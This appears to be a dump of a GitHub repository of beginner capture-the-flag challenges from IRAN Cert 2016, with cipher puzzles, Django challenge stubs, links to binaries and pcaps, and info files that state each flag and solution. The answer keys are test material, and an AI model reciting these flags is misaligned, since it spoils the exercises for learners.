Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/fonts/times_new_yorker.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Crypto/10pt- different bases/cipher.txt: -------------------------------------------------------------------------------- 1 | OB4GKZJAO5UGO6BMEB4WK5D2EBRGYICUJFKFMTKZPNKXI3DYGMZF6QSHL5FUQTK7KZRGSYJTNN6Q -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Crypto/10pt- different bases/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | well done, flag is APACTF{Base32_IN_ROT_Ciph3r} 3 | 4 | 5 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Crypto/5pt- change your position/cipher.txt: -------------------------------------------------------------------------------- 1 | WOL_FGITIENAA{ETOPLEGPC_I_HL,_AHPODE__ICAONERDFSTNS_C} 2 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- use your brain/data: -------------------------------------------------------------------------------- 1 | ----[---->+<]>++.++[->+++++<]>+.[->++++<]>+.++.>-[--->+<]>-.[----->+<]>++.>--[-->+++++<]>.+[-->+<]>++++++++.[++>-------<]>.-------..[--->+<]>-.[->+++++<]>++.---------------.[--->+<]>++.---.--------.+++++++++++.+++[->+++<]>++.++++++++++++..----.+++++.-------.>--[-->+++<]>. 2 | 3 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- use your brain/info.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | I want to give a flag. that simple. So just execute this script to receive that Flag. 3 | 4 | 5 | Flag: 6 | APACTF{Funny_Programming} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- use your brain/use your brain/data: -------------------------------------------------------------------------------- 1 | ----[---->+<]>++.++[->+++++<]>+.[->++++<]>+.++.>-[--->+<]>-.[----->+<]>++.>--[-->+++++<]>.+[-->+<]>++++++++.[++>-------<]>.-------..[--->+<]>-.[->+++++<]>++.---------------.[--->+<]>++.---.--------.+++++++++++.+++[->+++<]>++.++++++++++++..----.+++++.-------.>--[-->+++<]>. 2 | 3 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- what is your dna/cipher.txt: -------------------------------------------------------------------------------- 1 | CACCCGAACAACCACTCTCAGACGCTTTCTCTGGGCCGCCGACAGGAAAGACCACCGGAACTGCGAAGCGAACAGACATGTAACAGACGATCG -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- what is your dna/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | APACTF{What_!5_ur_DNA!} 3 | 4 | Solution: 5 | Use this site to decrypt it: http://dna2z.com/DNA-o-gram/decode.php#.WG_lop8ksfA 6 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- what is your dna/what is your dna/cipher.txt: -------------------------------------------------------------------------------- 1 | CACCCGAACAACCACTCTCAGACGCTTTCTCTGGGCCGCCGACAGGAAAGACCACCGGAACTGCGAAGCGAACAGACATGTAACAGACGATCG -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Reverse/5pt- Hardcoded flag/hardcoded flag/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Reverse/5pt- Hardcoded flag/hardcoded flag/main -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Reverse/5pt- Hardcoded flag/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | APACTF{Ok4y_u_know_r3v3r53_bas!cs} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Reverse/5pt- Hardcoded flag/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Reverse/5pt- Hardcoded flag/main -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/10pt- easy messaging/cipher.txt: -------------------------------------------------------------------------------- 1 | . ...- . -. -. --- --- -... ... -.- -. --- .-- .-- .... .- - .. ... -- --- .-. ... . -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/10pt- easy messaging/easy messaging/cipher.txt: -------------------------------------------------------------------------------- 1 | . ...- . -. -. --- --- -... ... -.- -. --- .-- .-- .... .- - .. ... -- --- .-. ... . -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/10pt- easy messaging/info.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | Even thieves know this kind of encryption. It's very common and also distincted. Can you decrypt this text. If yes, please put the result in APACTF{} and submit it for me. 3 | 4 | Flag: 5 | APACTF{EVENNOOBSKNOWWHATISMORSE} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/5pt- hidden string/hidden string/nature.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/5pt- hidden string/hidden string/nature.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/5pt- hidden string/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | APACTF{Alw4ys_Ch3ck_string_command_f!r57} 3 | 4 | 5 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/5pt- hidden string/nature.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/5pt- hidden string/nature.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/ascii-art/ascii-art.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/ascii-art/ascii-art.zip -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/ascii-art/flag.txt: -------------------------------------------------------------------------------- 1 | APACTF{d03s_!7_r341y_W0r7h3d_7h47_much_points} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/vigenere/cipher.txt: -------------------------------------------------------------------------------- 1 | UNUGKJCLDEBUJXW -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/vigenere/easy cipher.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/vigenere/easy cipher.zip -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/vigenere/easy cipher/cipher.txt: -------------------------------------------------------------------------------- 1 | UNUGKJCLDEBUJXW -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/vigenere/flag.txt: -------------------------------------------------------------------------------- 1 | APACTF{SUPEREASYCIPHER} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/.idea/.name: -------------------------------------------------------------------------------- 1 | crypt_server -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/.idea/scopes/scope_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/admin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/admin.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/migrations/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/migrations/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/migrations/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/migrations/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/models.py: -------------------------------------------------------------------------------- 1 | from django.db import models 2 | 3 | # Create your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/models.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/models.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/settings.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/settings.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/urls.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/urls.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/wsgi.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/wsgi.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/db.sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/db.sqlite3 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/migrations/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/migrations/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/models.py: -------------------------------------------------------------------------------- 1 | from django.db import models 2 | 3 | # Create your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/30pt- rare encryption/cipher.txt: -------------------------------------------------------------------------------- 1 | }A rCPdl3TAolhF nep{seW!ri,ca _igyElaoC_luNFfrE -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/30pt- rare encryption/rare encryption/cipher.txt: -------------------------------------------------------------------------------- 1 | }A rCPdl3TAolhF nep{seW!ri,ca _igyElaoC_luNFfrE -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/40pt- rsa1/info.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | Your are provied an encrypted file with some parameters to decrypt it. Flag is in the encrypted file. Find it... 3 | 4 | Flag: 5 | APACTF{N!C3_J08_D3CRYP7!NG_M3} 6 | 7 | 8 | 9 | Usefull source for it: 10 | http://doctrina.org/How-RSA-Works-With-Examples.html -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Crypto/40pt- rsa1/rsa1/data.secret: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/40pt- rsa1/rsa1/data.secret -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/corroption/file: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/corroption/file -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/file.jpe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/file.jpe -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/file.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/file.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | APACTF{IT'S_JUST_THE_Begining_OF_For3nsics} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/arp-poison: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/arp-poison -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/attack.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/attack.pcapng -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/attack1/attack.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/attack1/attack.pcapng -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/.name: -------------------------------------------------------------------------------- 1 | project -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/dataSources.local.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/scopes/scope_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/admin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/admin.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/forms.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/forms.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/models.py: -------------------------------------------------------------------------------- 1 | from django.db import models 2 | from django.contrib.auth.models import User 3 | 4 | 5 | class Flag(models.Model): 6 | challenge = models.CharField(max_length=20) 7 | flag = models.CharField(max_length=100) -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/models.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/models.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/models.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/models.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/models.py: -------------------------------------------------------------------------------- 1 | from django.db import models 2 | from django.contrib.auth.models import User 3 | 4 | 5 | class SessionChallenge_prime_sum(models.Model): 6 | user = models.OneToOneField(User) 7 | expiration_date = models.DateTimeField() 8 | prime_number = models.IntegerField() -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/models.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/models.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/models.py: -------------------------------------------------------------------------------- 1 | from django.db import models 2 | from django.contrib.auth.models import User 3 | 4 | 5 | class SessionChallenge_simple_post(models.Model): 6 | user = models.OneToOneField(User) 7 | expiration_date = models.DateTimeField() 8 | random_number = models.IntegerField() -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/models.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/models.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/db.sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN 